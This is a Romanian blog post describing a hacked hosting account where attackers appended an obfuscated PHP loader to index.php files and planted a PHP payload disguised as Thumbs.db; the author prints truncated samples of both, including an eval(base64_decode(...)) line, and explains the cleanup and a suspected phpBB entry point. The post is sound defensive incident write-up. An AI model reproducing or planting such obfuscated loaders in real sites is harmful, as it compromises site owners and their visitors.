Servere cu forumuri, wordpress-uri sparte de hackeri

In luna noiembrie 2011 am intalnit un server spart de hackeri. Pe scurt, fisierele index.php au fost editate si la final li s-a adaugat o linie lunga, ce contine urmatoarele linii (am taiat un pic din cârnații de caractere, pentru a nu pune codul în totalitate):

if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdl...";
$eva1tYldakBcVSir = "x73164x72162x65...";
$eva1tYldakBoVS1r = "x65143x61154x70...";
$eva1tYidokBoVSjr = "x3b51x29135x31...";
$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "x73164x72x65143x72160164x72";
$eva1tYlbakBcVSir = "x67141x6f133x70170x65";
$eva1tYldakBoVS1r = "x65143x72160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
*/

Codul de mai sus nu functioneaza impreuna cu inca un fisier – numit Thumbs.db – si situat in acelasi director. Exempu de cod din acest fisier:

eval(base64_decode("aWYgKCRldmFsSnlDZUxxSXN0WG9wdWggIT0gNjQ4NzIpIHtmdW5jdGlvbiBldmFsV3FmR0RMSk...

Ce am facut in situatia aceasta

1. Am repus fisierele din back-up-ul serverul de gazduire. Totusi, am gasit probleme si dupa aceea! Ciudat! Intr-un blog wordpress, am obtinut eroarea de mai jos, dar din cauza metodei nr.2:

Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0
Fatal error: Unknown: Failed opening required '/homeabc/def/ghi/Thumbs.db' (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

2. Am sters toate fisierele Thumbs.db din contul de gazduire.

Despre acest tip de spargere

Hackerul modifica toate fisierele cu denumire index.php, ce le gaseste pe server, adaugandu-le o linie in partea de jos. Langa fisierul modificat, copiaza un fisier Thumbs.db, care contine deasemenea cod PHP. Prin accesarea fisierul PHP, codul astfel inserat se decodifica si se executa.

Pe unde se poate intra pe server (backdoors)

In contul de gazduire erau site-uri, wordpress-uri si forumuri phpBB. Din logurile de erori, am extras urmatorul text, deci presupun ca s-a intrat prin phpBB 3.0.8.

[03-Nov-2011 23:28:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/abc/public_html/sitex/forum/includes/hooks/index.php(250) : regexp code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /home/abc/public_html/sitex/forum/includes/functions.php on line 2641

Alete articole similare despre acest tip de spargere:
http://wordpress.org/support/topic/websites-under-attack
Voi reveni cu detalii in curand.

Leave a Reply

Your email address will not be published. Required fields are marked *


*